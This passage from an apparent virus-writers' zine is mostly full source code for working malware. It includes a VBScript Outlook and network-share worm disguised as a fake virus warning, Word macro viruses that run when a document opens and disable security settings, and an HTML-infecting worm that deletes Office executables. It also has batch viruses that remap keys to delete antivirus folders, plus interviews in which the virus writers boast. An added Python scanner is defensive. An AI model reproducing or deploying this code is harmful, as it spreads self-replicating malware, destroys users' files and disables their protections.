S.Write "<?XML version=""1.0""?>"&O&"<component>"&O&" <comment>"&O&"
NETWORK/OUTLOOK.FakeHoax"&O&" </comment>"&O&" <public>"&O&" <property
name=""AttachmentFile""/>"&O&" <property name=""TextFile""/>"&O&" <property
name=""WormFile""/>"&O&" <method name=""DelTempFiles""/>"&O&" <method
name=""NetworkSpreading"">"&O&" <parameter name=""FileName""/>"&O&" </method>"&O&
" <method name=""OutlookSpreading"">"&O&" <parameter name=""Body""/>"&O&"
<parameter name=""MaxAmount""/>"&O&" <parameter name=""Subject""/>"&O&" </method>"&O&
" <method name=""ShowText"">"&O&" <parameter name=""Content""/>"&O&" </method>"&O&
" </public>"&O&" <script language=""VBScript"">"&O&" <![CDATA["&O&" Sub DelTempFiles"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" If FSO.FileExists(AttachmentFile)
Then FSO.DeleteFile AttachmentFile, True"&O&" If FSO.FileExists(TextFile) Then
FSO.DeleteFile TextFile, True"&O&" Set FSO = Nothing"&O&" End Sub"&O&" Sub
NetworkSpreading(FileName)"&O&" On Error Resume Next"&O&" Set Network =
CreateObject(""WScript.Network"")"&O&" Set Shares = Network.EnumNetworkDrives"&O&"
If Shares.Count > 0 Then"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"
&O&" For Counter1 = 0 To Shares.Count - 1"&O&" If Shares.Item(Counter1) <>
"""" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)"&O&"
Next"&O&" Set FSO = Nothing"&O&" End If"&O&" Set Shares = Nothing"&O&"
Set Network = Nothing"&O&" End Sub"&O&" Sub OutlookSpreading(MaxAmount, Subject, Body)"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" FSO.CopyFile WormFile, AttachmentFile"
&O&" Set FSO = Nothing"&O&" Outlook = """""&O&" Set Outlook =
CreateObject(""Outlook.Application"")"&O&" If Outlook <> """" Then"&O&" Set MAPI
= Outlook.GetNameSpace(""MAPI"")"&O&" For Each List In MAPI.AddressLists"&O&
" If List.AddressEntries.Count > 0 Then"&O&" Set Email1 =
Outlook.CreateItem(0)"&O&" If List.AddressEntries.Count > MaxAmount Then"&O&
" Dim Address()"&O&" ReDim Address(MaxAmount - 1)"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&" For Counter1 =
0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O&
" If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1"&O&" Next"&O&" Next"&O&" For
Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1
+ 1 To MaxAmount - 1"&O&" If Address(Counter1) = Address(Counter2) And
Address(Counter1) <> -1 Then Address(Counter2) = -1"&O&" Next"&O&
" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&"
If Address(Counter1) <> -1 Then"&O&" Set Entry =
List.AddressEntries(Address(Counter1))"&O&" If Counter1 = 0 Then Addresses
= Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&"
Set Entry = Nothing"&O&" End If"&O&" Next"&O&" Else"&O
&" For Counter1 = 1 To List.AddressEntries.Count"&O&" Set Entry
= List.AddressEntries(Counter1)"&O&" If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set
Entry = Nothing"&O&" Next"&O&" End If"&O&" Email1.BCC =
Addresses"&O&" Email1.Subject = Subject"&O&" Email1.Body = Body"&O&
" Email1.Attachments.Add AttachmentFile"&O&" Email1.DeleteAfterSubmit
= True"&O&" Email1.Send"&O&" Set Email1 = Nothing"&O&"
Randomize"&O&" If Int(5 * Rnd) = 0 Then"&O&" Set Email2 =
Outlook.CreateItem(0)"&O&" Email2.BCC = Addresses"&O&"
Email2.Subject = ""Alma"""&O&" Email2.Body = ""No alucines que te amo,"" &
Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" &
Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya
sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n no manda en
mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(237) & "" lo hiciera,"" & Chr(13) & Chr(10)
& ""mi alma estar"" & Chr(237) & ""a perdida."""&O&" Email2.DeleteAfterSubmit =
True"&O&" Email2.Send"&O&" Set Email2 = Nothing"&O&"
End If"&O&" End If"&O&" Next"&O&" Set MAPI = Nothing"&O&" Set
Outlook = Nothing"&O&" End If"&O&" End Sub"&O&" Sub ShowText(Content)"&O&"
On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O&
" Set File = FSO.CreateTextFile(TextFile, True)"&O&" File.Write(Content)"&O&"
File.Close"&O&" Set File = Nothing"&O&" Set FSO = Nothing"&O&" Set WSHShell =
CreateObject(""WScript.Shell"")"&O&" WSHShell.Run(TextFile)"&O&" Set WSHShell =
Nothing"&O&" End Sub"&O&" ]]>"&O&" </script>"&O&"</component>"&O
S.Close
Set F=GetObject("script:"&G.BuildPath(G.GetSpecialFolder(2),A))
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.VBE")
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT")
F.WormFile=WScript.ScriptFullName
F.ShowText "Thought you might be interested in this message. If you receive an"&O&"email
with a file called ""California"" do not open the file. The file"&O&"contains the
""WOBBLER"" virus."&O&O&"This information was announced yesterday morning by IBM. The
statement"&O&"says that ... ""This is a very dangerous virus, much worse than"&O&"'Melissa'
and there is NO remedy for it at this time. Some very sick"&O&"individual has succeeded in
using the reformat function from Norton"&O&"Utilities causing it to completely erase all
documents on the hard"&O&"drive. It has been designed to work with Netscape Navigator and"&O&
"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible"&O&"computers. This
is a new, very malicious virus and not many people"&O&"know about it at this time."""&O&
"""Please pass this warning file to everyone in your address book and"&O&"share it with all
your online friends ASAP so that the destruction it"&O&"can cause may be minimized."""&O
F.OutlookSpreading 100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information."
F.NetworkSpreading "WOBBLER.TXT.VBE"
F.DelTempFiles
G.DeleteFile G.BuildPath(G.GetSpecialFolder(2),A),True
' Here is the WSC file (the COM object), I used spaces and "normal" variable names to make it
' easier to read:
<?XML version="1.0"?>
<component>
<comment>
NETWORK/OUTLOOK.FakeHoax
</comment>
<public>
<property name="AttachmentFile"/>
<property name="TextFile"/>
<property name="WormFile"/>
<method name="DelTempFiles"/>
<method name="NetworkSpreading">
<parameter name="FileName"/>
</method>
<method name="OutlookSpreading">
<parameter name="Body"/>
<parameter name="MaxAmount"/>
<parameter name="Subject"/>
</method>
<method name="ShowText">
<parameter name="Content"/>
</method>
</public>
<script language="VBScript">
<![CDATA[
Sub DelTempFiles
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True
If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True
Set FSO = Nothing
End Sub
Sub NetworkSpreading(FileName)
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set FSO = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath(
Shares.Item(Counter1), FileName)
Next
Set FSO = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
Sub OutlookSpreading(MaxAmount, Subject, Body)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile WormFile, AttachmentFile
Set FSO = Nothing
Outlook = ""
Set Outlook = CreateObject("Outlook.Application")
If Outlook <> "" Then
Set MAPI = Outlook.GetNameSpace("MAPI")
For Each List In MAPI.AddressLists
If List.AddressEntries.Count > 0 Then
Set Email1 = Outlook.CreateItem(0)
If List.AddressEntries.Count > MaxAmount Then
Dim Address()
ReDim Address(MaxAmount - 1)
For Counter1 = 0 To MaxAmount - 1
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) = -1 Then Address(Counter1) = Int(
List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) <> -1 Then
Set Entry = List.AddressEntries(Address(Counter1))
If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
End If
Next
Else
For Counter1 = 1 To List.AddressEntries.Count
Set Entry = List.AddressEntries(Counter1)
If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
Next
End If
Email1.BCC = Addresses
Email1.Subject = Subject
Email1.Body = Body
Email1.Attachments.Add AttachmentFile
Email1.DeleteAfterSubmit = True
Email1.Send
Set Email1 = Nothing
Randomize
If Int(5 * Rnd) = 0 Then
Set Email2 = Outlook.CreateItem(0)
Email2.BCC = Addresses
Email2.Subject = "Alma"
Email2.Body = "No alucines que te amo," & Chr(13) & Chr(10) & "cuando en
realidad es solo" & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n qui" & Chr(233) & "n lo
hace." & Chr(13) & Chr(10) & "Porque como ya sabr" & Chr(225) & "s," & Chr(13) & Chr(10) &
"mi coraz" & Chr(243) & "n no manda en mi vida," & Chr(13) & Chr(10) & "si as" & Chr(237) &
" lo hiciera," & Chr(13) & Chr(10) & "mi alma estar" & Chr(237) & "a perdida."
Email2.DeleteAfterSubmit = True
Email2.Send
Set Email2 = Nothing
End If
End If
Next
Set MAPI = Nothing
Set Outlook = Nothing
End If
End Sub
Sub ShowText(Content)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(TextFile, True)
File.Write(Content)
File.Close
Set File = Nothing
Set FSO = Nothing
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run(TextFile)
Set WSHShell = Nothing
End Sub
]]>
</script>
</component>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
If E.ProcOfLine(E.ProcStartLine("IT", vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 Then
E.AddFromString B
For F = 1 To E.CountOfLines
G = E.ProcOfLine(F, 1)
If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1
) & ": IT"
H = G
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Neclovek
'My_Comments = Do Not Distribute!
End Sub
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
F = ""
F = E.Lines(E.ProcStartLine("IT", vbext_pk_Proc), E.ProcCountLines("IT", vbext_pk_Proc))
If E.CountOfLines > 2 And F <> B Then E.AddFromString B
For G = 1 To E.CountOfLines
H = E.ProcOfLine(G, 1)
If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1
) & ": IT"
I = H
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Unperson
'My_Comments = Do Not Distribute!
End Sub
<SCRIPT LANGUAGE="VBScript">
<!--
Dim FSO,MSBound,DC,D,TMP,F
MSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBound,DC,D,TMP,F$ MSBound =
#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)$ TMP =
ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TMP,Chr(124))$ MSBound = Left(TMP,F-1) &
MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr(124))$ MSBound = Left(MSBound,F-1) &
Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripting.FileSystemObject#)$ If Err.Number = 0
Then$ Set DC = FSO.Drives$ For Each D In DC$ If D.DriveType = 2
Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub
SweepDrive(pPath)$ Dim F, S, O$ On Error Resume Next$ Set F = FSO.GetFolder(pPath)$
InfectFiles F$ Set S = F.SubFolders$ For Each O In S$ SweepDrive(pPath & O.Name &
#\#)$ Next $End Sub $$Sub InfectFiles(pFolder)$ Dim F,Member,Ext,M,C$ On Error
Resume Next$ Set F = pFolder.Files$ For Each Member In F$ M =
UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M =
#WORD.EXE# Then$ Set M = FSO.GetFile(Member.Path)$ M.Attributes =
(M.Attributes And 1) - 1$ M.Delete$ End If $ Ext =
UCase(FSO.GetExtensionName(Member.Name))$ If Ext = #HTML# Or Ext = #HTM# Then$
Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If
InStr(1,C,MSBound) = 0 Then$ Set M = FSO.CreateTextFile(Member.Path,
True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$
Next$End Sub$$Private Function ReplaceWithIn(CurChar,NewChar,SourceString)$ Dim T,TMP$ T =
1$ TMP = SourceString$ Do While T > 0$ T = InStr(T, TMP, CurChar)$ If T > 0 Then
TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop$ ReplaceWithIn = TMP$End
Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
On Error Resume Next
TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)
TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)
F = InStr(1,TMP,Chr(124))
MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)
F = InStr(2500,MSBound,Chr(124))
MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)
Sub SweepDrive(pPath)
Dim F, S, O
On Error Resume Next
Set F = FSO.GetFolder(pPath)
InfectFiles F
Set S = F.SubFolders
For Each O In S
SweepDrive(pPath & O.Name & "\")
Next
End Sub
Sub InfectFiles(pFolder)
Dim F,Member,Ext,M,C
On Error Resume Next
Set F = pFolder.Files
For Each Member In F
M = UCase(Member.Name)
If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
Set M = FSO.GetFile(Member.Path)
M.Attributes = (M.Attributes And 1) - 1
M.Delete
End If
Ext = UCase(FSO.GetExtensionName(Member.Name))
If Ext = "HTML" Or Ext = "HTM" Then
Set M = FSO.OpenTextFile(Member.Path,1)
C = M.ReadAll
If InStr(1,C,MSBound) = 0 Then
Set M = FSO.CreateTextFile(Member.Path, True)
M.WriteLine MSBound & C
M.Close
End If
End if
Next
End Sub
'MSBound by Suppa.
-->
</SCRIPT>
<HTML>
<HEAD><TITLE>MSBound</TITLE></HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR>
<CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10>
<TR><TD>
<FONT COLOR="#FF0000">
<U><B><FONT COLOR="#FF0000"> MSBound by Suppa.</B></U>
<BR><BR><BR>
This is the parent HTML file containing MSBound written by Suppa.<BR>
Feel free do to what you want with it, but don't blame me if it comes back to you.<BR>
<BR>
Special thanks go out to Gigabyte for getting me interested in these things.<BR>
</FONT>
</TD></TR>
</TABLE></CENTER>
</BODY>
</HTML>
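As an added defensive example (not code from the zine or from Suppa's worm): a Python scanner that recognises an .htm/.html file carrying a prepended MSBound-style script block and strips it to recover the original markup. It assumes only the layout the listing above shows (the worm writes its whole VBScript block, ending in the comment 'MSBound by Suppa., in front of the file with WriteLine); the sample infected file is constructed here.

```python
"""Detect and clean HTML files carrying a prepended MSBound-style VBScript block.

Added example, not code from the zine or from the worm. Assumptions, taken
from the listing above: the block starts the file with <SCRIPT LANGUAGE="VBScript">,
contains the comment 'MSBound by Suppa., and is followed by the original
content (the worm wrote `MSBound & C` with WriteLine).
"""
import re
from pathlib import Path
from typing import Iterator, Optional, Tuple

SIGNATURE = "'MSBound by Suppa."  # author comment inside the block (from the listing)
OPEN_TAG = re.compile(r'^\s*<SCRIPT\s+LANGUAGE="VBScript">', re.IGNORECASE)
CLOSE_TAG = re.compile(r"</SCRIPT>", re.IGNORECASE)


def find_prepended_block(content: str) -> Optional[Tuple[int, int]]:
    """Return (start, end) of a signed script block at the top of the file, or None.

    A leading VBScript block without the signature is left alone, so pages
    that legitimately start with their own script are not flagged.
    """
    opened = OPEN_TAG.match(content)
    if opened is None:
        return None
    closed = CLOSE_TAG.search(content, opened.end())
    if closed is None:
        return None
    if SIGNATURE not in content[opened.start():closed.end()]:
        return None
    return opened.start(), closed.end()


def is_infected(content: str) -> bool:
    return find_prepended_block(content) is not None


def disinfect(content: str) -> str:
    """Return the file with the prepended block removed.

    The MSBound string ends in two line breaks ("$$" in the encoded copy) and
    WriteLine adds one more after the original content; both are removed so
    the result matches the original file exactly.
    """
    span = find_prepended_block(content)
    if span is None:
        return content
    rest = content[span[1]:]
    for _ in range(2):  # the two line breaks that close the block
        for nl in ("\r\n", "\n"):
            if rest.startswith(nl):
                rest = rest[len(nl):]
                break
    for nl in ("\r\n", "\n"):  # the line break WriteLine appended
        if rest.endswith(nl):
            rest = rest[:-len(nl)]
            break
    return rest


def scan_tree(root: Path, clean: bool = False) -> Iterator[Path]:
    """Yield infected .htm/.html files under root; rewrite them when clean=True."""
    for path in root.rglob("*"):
        if path.suffix.lower() not in (".htm", ".html") or not path.is_file():
            continue
        data = path.read_bytes().decode("latin-1")
        if is_infected(data):
            if clean:
                path.write_bytes(disinfect(data).encode("latin-1"))
            yield path


# Constructed sample block: a stand-in for the real one, carrying only the
# signature comment, not the worm body.
SAMPLE_BLOCK = (
    '<SCRIPT LANGUAGE="VBScript">\r\n<!--\r\n'
    "' (worm body omitted in this constructed sample)\r\n"
    "'MSBound by Suppa.\r\n-->\r\n</SCRIPT>"
)
SAMPLE_ORIGINAL = (
    "<HTML>\r\n<HEAD><TITLE>Home</TITLE></HEAD>\r\n"
    "<BODY>Hello</BODY>\r\n</HTML>\r\n"
)


def make_infected(original: str, block: str = SAMPLE_BLOCK) -> str:
    """Reproduce the on-disk layout the worm's WriteLine produces (constructed)."""
    return block + "\r\n\r\n" + original + "\r\n"


if __name__ == "__main__":
    sample = make_infected(SAMPLE_ORIGINAL)
    print("infected:", is_infected(sample))
    print("restored exactly:", disinfect(sample) == SAMPLE_ORIGINAL)
```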
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As
Long, lpColorValues As Long) As Long
Private Sub Document_Open()
' LSD
' By The WalruS 09/00 v1.00
Randomize
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "8.0"
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
End Select
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = False
End With
ChangeHook = Int(Rnd * 2)
Select Case ChangeHook
Case 0
Hook = "Private Sub Document_Open()"
Case 1
Hook = "Private Sub Document_Close()"
End Select
With Dialogs(wdDialogFileSummaryInfo)
.Author = "WalruS"
.Title = "CandyFlippin"
.Execute
End With
TimeCheck = Second(Now)
One = Left(TimeCheck, 1)
Two = Right(TimeCheck, 1)
If One = Two Then Call CandyFlip
NormalTemplate.Saved = True
If ActiveDocument.Saved <> True Then ActiveDocument.Save
End Sub
' ---[snip]---
' Hi there kids, this some very old werk to show you how to code anti-
' bloodhound-heuristically. Well, it's just a basic example to prove
' that it's possible to bypass that heuristic. xD Just check it out and
' enjoy!
' ---[snip]---
' Hi there kids, same as Lithium, I just can present you some old werk
' because of that damn zip disk crash. Hope you can enjoy this language
' independent x97m. Catch y'all around.
::IRC.HighHopes.c
::by -KD- [Metaphase VX Team & NoMercyVirusTeam]
::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,
::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea
::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus
:noscr
echo Keep this open for to have Good Luck! >>c:\highhopes1.txt
echo When it closes you will have Good Luck! >>c:\highhopes1.txt
echo Some one has high hopes for You!! >>c:\highhopes1.txt
@echo on
type c:\highhopes1.txt
@echo off
echo y| del c:\highhopes1.txt >nul
if errorlevel 1 goto noftp
%windir%\ftp.exe -s:c:\ftpme.txt >nul
:noftp
echo >>c:\highhopes.txt
echo The grass was greener. The light was brigher. >>c:\highhopes.txt
echo The taste was sweeter. The nights of wonder. >>c:\highhopes.txt
echo With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txt
echo The water flowing. The endless river. >>c:\highhopes.txt
echo For Ever And Ever..... >>c:\highhopes.txt
@echo on
type c:\highhopes.txt
@echo off
if errorlevel 1 goto nogo
echo y| del c:\highhopes.txt >nul
cd \pkdown
c:\pkdown\pkzip204.exe >nul
echo y| copy %0 c:\pkdown\highhopes.bat >nul
c:\pkdown\pkzip hope.zip highho~1.bat >nul
echo y| copy hope.zip c:\mirc >nul
cd \
echo y| del c:\pkdown\*.* >nul
rd c:\pkdown >nul
echo y| del c:\ftpme.txt >nul
nogo:
@echo off
cls
@echo off%_FukThat%
::###########################################
::Deloss / NuKE
::###########################################
set FukThat=%0.bat
find "FukThat"<%FukThat%>c:\_FukThat.bat
attrib c:\_FukThat.bat +h
:FG
:FZ
set FukThat=
goto FE
:FV
shift%_FukThat%
goto FV
:FI
find "FukThat"<%3>nul
type %3>FukThat$
echo.>>FukThat$
type c:\_FukThat.bat>>FukThat$
:FD
echo.|date|find "12">nul.FukThat
echo DEVICE=c:\windows\command\ansi.sys>>config.sys
if errorlevel 1 goto FN
:FN
echo.|date|find "13">nul.FukThat
@echo on
echo and if they say you can't come around here say *fuck that*.
echo and if they say you can't come around me say *fuck that*.
ESC["n";"y";13p
ESC["y";"n";13p
ESC["N";"y";13p
ESC["Y";"n";13p
ESC["a";"del c:\avp";13p
ESC["e";"del c:\f-prot";13p
ESC["i";"del c:\mcafee";13p
ESC["o";"del c:\nav";13p
ESC["A";"del c:\avp";13p
ESC["E";"del c:\f-prot";13p
ESC["I";"del c:\mcafee";13p
ESC["O";"del c:\nav";13p
if errorlevel 1 goto FE
echo off
exit FukThat
:FE
Real Time Interview with Rajaat
Interviewer: Gigabyte
First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>
Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of
stonedness. I think I'll manage to become Dutch quite well ;-)
How old were you when you had your first experience with computers?
My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7
years old.
I was just about your age when I conducted my first virus experiments, just before I got 18 years old.
How many viruses have you written by now.. any chance your totally drugged brain can still remember?
I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.
I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I
frankly don't care if I appear to be friendly or not.
Hah, that's a good question. I would like a language in which you have complete control over the code it generates, so
highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I
yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though
extremely bloated.
Did you ever write anything destructive? If so, how do you feel about that now?
I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own
good to try to make them as harmless as possible.
What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?
I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be
smart enough to recognize that a major part of it is written in Borland C++, instead of Pascal.
Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate
with may want to consider themselves my enemy but that makes no difference to me.
I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the
necessity of installing a good scanner from a trusted source.
If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had
caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help
him/her out?
Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My
hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to
people who are interested.
How long are you planning to stay in the scene? (Out, out!! ;)
I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I
yet would like to try out, but this mainly has to do with compilers and interpreter issues.
How big do you think my chances are to survive smoking a joint? (in %)
Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a
try..
If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.
Which AVers do you hate most?
I don't hate them, though it is a pity they earn money on the digital havoc we wreak.
I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in
my writing (or lack thereof) skills.
I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have
my respect.
How important is virus writing for you and does it have any influence on your life?
It has not such a great importance as it used to be for me, since my job consumes most time.
Are you in any other underground scene, except for VX? (hacking, phreaking..)
Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.
I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.
I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't
live on microwave food alone).
No.
Aargh! Now questions about food while I'm starving? I like pastas and chips of course.
What do you like most about the scene and writing viruses?
Not right now, I'll mail you when I come to think of something.
Interviewer: Gigabyte
First of all, how did you come up with the name 'Irok'?
What about the virus are you personally most proud of?
I'm proud of the fact that avers had no idea what its payloads did for a very long time.
some of them still have incorrect descriptions ;p
The memory management section. It's a bitch because of all the little routines inside irok.
Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funny
that happened, habits, etc.), and if so, did you do this in Irok?
Did you get any positive or negative reactions on the virus payload from other VXers?
What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?
When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message
is from lyrics of the song 'Aenema' by band 'Tool'. We won't reproduce the message here as the song seriously needs
the Parental Advisory sticker for explicit lyrics.
Hahahahahaha
it sure is
Which AV was that from?
http://www.Europe.F-Secure.com/v-descs/irok.htm
hmm, no
toadie was funnier
iroks mean ;p
On which points is Irok better than other viruses, and what are its weak points?
It's better than some other viruses by default because it works as designed...
its weak points would be the memory it requires, and its size.
and the fact that it's not polymorphic.
Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame that
they weren't worth any attention at all, and which ones do you respect?
shrug...
The vbs viruses suck in my opinion.
As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.
What do you consider the most important advantage and disadvantage compared to ASM viruses?
advantage... total control of the pc, disadvantage, takes a long time to write a good one.
If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by
running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?
Nope
I have little/nothing to do with my family.
Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the
language it's written in, as ASIC isn't common for viruses?
Yep
and I think perhaps they don't know asm as well as they claim.
How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride,
stress)?
probably not.
Yes. For those of you who got hit by it, I hope you lost everything.
Oh yes
Greetings to : heh, Nobody
Hatez goes out to: Most of you on both sides, fuck you all.
So much for political correctness eh? <g>
Interviewer: Gigabyte
